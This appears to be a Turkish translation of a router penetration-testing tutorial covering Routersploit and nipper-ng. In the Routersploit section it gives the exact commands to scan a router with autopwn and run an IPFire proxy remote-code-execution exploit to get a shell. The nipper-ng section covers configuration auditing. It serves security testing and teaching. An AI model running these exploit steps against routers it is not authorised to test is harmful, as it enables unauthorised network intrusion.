Kurumsal ağlarda ve küçük ev ağlarında en az bir router / switch vardır. Buna erişim sağlamış olmanız genellikle tüm ağa erişim sağlamış olmaktasınız anlamına gelmektedir. Kullanıcılar bu tür ağ cihazlarına çok para harcamayı sevmiyor. Çoğu ev routler’ları, zafiyetleri olan eski sürüm yazılımlar kullanmakta. Bugün, iki araca bakacağız: Router’ların ve Switch’lerın zafiyetlerini sömürmek için Routersploit aracı ve yapılandırma dosyalarının denetimi için kullanılan başka bir araç olan nipper-ng aracı.
Routersploit
Routersploit Framework, gömülü cihazlara için üretilmiş açık kaynaklı zafiyet sömürü aracıdır.
Sızma testi işlemlerine yardımcı olan çeşitli modüllerden oluşur:
- exploits – Tespit edilen güvenlik açıklarından yararlanan modüller
- creds – Kimlik bilgilerini ağ hizmetlerine karşı test etmek için tasarlanmış modüller
- scanners – Bir hedefin herhangi bir istismara açık olup olmadığını kontrol eden modüller
- payloads – Çeşitli mimariler ve enjeksiyon noktaları için yük üretmekten sorumlu modüller
- generic – Genel saldırılar gerçekleştiren modüller
Routerploit’i kurmak için, önce pip’i kurmamız ve ardından routerersploit’i indirmeniz gerekiyor.
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit.git/
python3 -m pip install -r requirements.txt
Ayrıca, aracın genel işleyişine yardımcı olacak iki paket daha kurmamız gerekecek:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
Gereksinimlerin ve paketlerin başarılı bir şekilde kurulmasından sonra, aşağıdaki komuta routersploit’i başlatabilirsiniz.
python3 rsf.py
Ana menüde versiyon numarasını görüyoruz. Aşağıdaki komutları kullanarak sürümün her zaman güncel olduğundan emin olabilirsiniz.
cd routersploit
git pull
Araç ile yapabileceklerimizi öğrenmek için “help” komutunu kullanabilirsiniz.
Girişte açıklandığı gibi kullanabileceğimiz tüm modüllerin bir listesi olacaktır. Listedeki bir tarayıcıyı, örnek olarak autopwn’i kullanmak istiyorsanız aşağıdaki komutları yazıyoruz:
search scanners
use scanners/autopwn
Autopwn’i hedef cihazın kullanılabilir zafiyetlerinin listesini elde edebilmek için seçtik. Araç içerisinde CCTV kameraları gibi belirli amaçlar için kullanılabilen başka tarayıcılar da mevcut.
Bu tarayıcıyı çalıştırmadan önce aşağıdaki komutla exploit arayüzünde bulunan seçeneklere bakacağız:
show options
Tarayıcıyı çalıştırmadan önce bazı ayarları özelleştirmemiz gerekecek.
target = 192.168.29.200 (Router’ın IP Adresi)
http_port = 444
Not: Taramayı mevcut donanımınız üzerinde yapmak istemiyorsanız, VyOS’u da kurabilirsiniz.
set target 192.168.29.200
set http_port 444
run
Tarayıcıyı çalıştırdıktan sonra, yönlendiricinin aşağıda belirtildiği gibi uzaktan kod çalıştırmaya karşı zafiyetinin olduğunu görüyoruz.
Artık tek yapmanız gereken, zafiyeti seçmek ve çalıştırmak. Bunu yapmak için aşağıdaki komutları kullanabilirsiniz:
use exploits/routers/ipfire/ipfire_proxy_rce
set target 192.168.29.200
set port 444
run
Router’ı başarıyla kullandık ve bir komut penceresinin açıldığını gördük! Bir test komutu yürütüyoruz ve çalıştığını görüyoruz.
Nipper-ng
Nipper-ng yazılımı, ağ altyapısında router, güvenlik duvarları ve switch gibi birçok farklı cihaz türünün güvenlik yapılandırmaları hakkında gözlem yapmak / denetlemek için kullanılır. Daha önce CiscoParse olarak biliniyordu.
apt-get install nipper-ng
nipper -h
Yukarıdaki resimde gösterildiği gibi uygulama hakkında ayrıntılı bir yardım penceresi görüntülemek için aşağıdaki komutu kullanabiliriz:
nipper --help
SNMP’nin birçok router ve switch’de yaygın olarak kullanıldığını bildiğimiz için, nipper yazılımındaki SNMP seçeneklerini araştıracağız.
nipper --help=SNMP
Bu komut ile komutta SNMP modülü hakkunda uygulamanın neler sunulabileceğini görüyoruz. Örneğin şunları yapabilir:
- Geçerli yapılandırmayı bir router’dan alın
- Cihazın yapılandırmasını yerel olarak depolanan bir * .conf dosyasından veya * .txt dosyasından denetleyin / inceleyin
Diğer komutları da manuel olarak kontrol edebilirsiniz.
Cisco IOS(Internetwork Operating System) tabanlı bir router’ın yapılandırmasını incelemek için bir komut oluşturacağız, ancak aşağıda verilen komut satırı parametrelerinden diğer cihazlar seçilebilir:
–ios-switch Cisco IOS-based Switch
–ios-router Cisco IOS-based Router (default)
–ios-catalyst Cisco IOS-based Catalyst
–pix Cisco PIX-based Firewall
–asa Cisco ASA-based Firewall
–fwsm Cisco FWSM-based Router
–catos Cisco CatOS-based Catalyst
–nmp Cisco NMP-based Catalyst
–css Cisco Content Services Switch
–screenos Juniper NetScreen Firewall
–passport Nortel Passport Device
–sonicos SonicWall SonicOS Firewall
–fw1 CheckPoint Firewall-1 Firewall
Şimdi, bir router yapılandırma dosyasından bir komut oluşturuyoruz. Cisco router olması durumunda bir yönlendirici yapılandırma dosyasının nasıl yedekleneceğini ve geri yükleneceğini görmek için buradaki bağlantıyı izleyin. Aşağıdaki komutta üç parametre tanımlamamız gerekecek:
ios-router: aygıt türü
input: yönlendirici yapılandırma dosyası
output: denetim raporunun hedefi
Komut aşağıdaki gibidir:
nipper –ios-router –input=/root/Desktop/router.txt –output=report.html
Html belgesi birkaç dakika içinde hazır olacaktır! Raporu HTML olarak incelemek için firefox’ta açıyoruz ve az önce denetlediğimiz ağ cihazının detaylı bir güvenlik raporunu görebiliyoruz!
Bu makalede iki aracı ele aldık: Çeşitli ağ cihazlarının zafiyetlerini sömürmek için kullanılan bir araç olan Routersploit ve ağ cihazlarının yanlış yapılandırmaları hakkında kapsamlı raporlar oluşturan Nipper-ng . Ağ cihazları, çeşitli saldırıları önlemek için en son cihaz yazılımı ile güncellenmelidir ve bu iki araç bu durumlar için yararlı olacaktır. Cihaz yapılandırmalarını manuel olarak kontrol etmek zorunda kalan denetçiler ve güvenlik analistlerinin yüklerini sırtlarından olan kullanışlı araçtır.
Kaynak: https://www.hackingarticles.in/router-penetration-testing/ (Çeviri)
Leave a Reply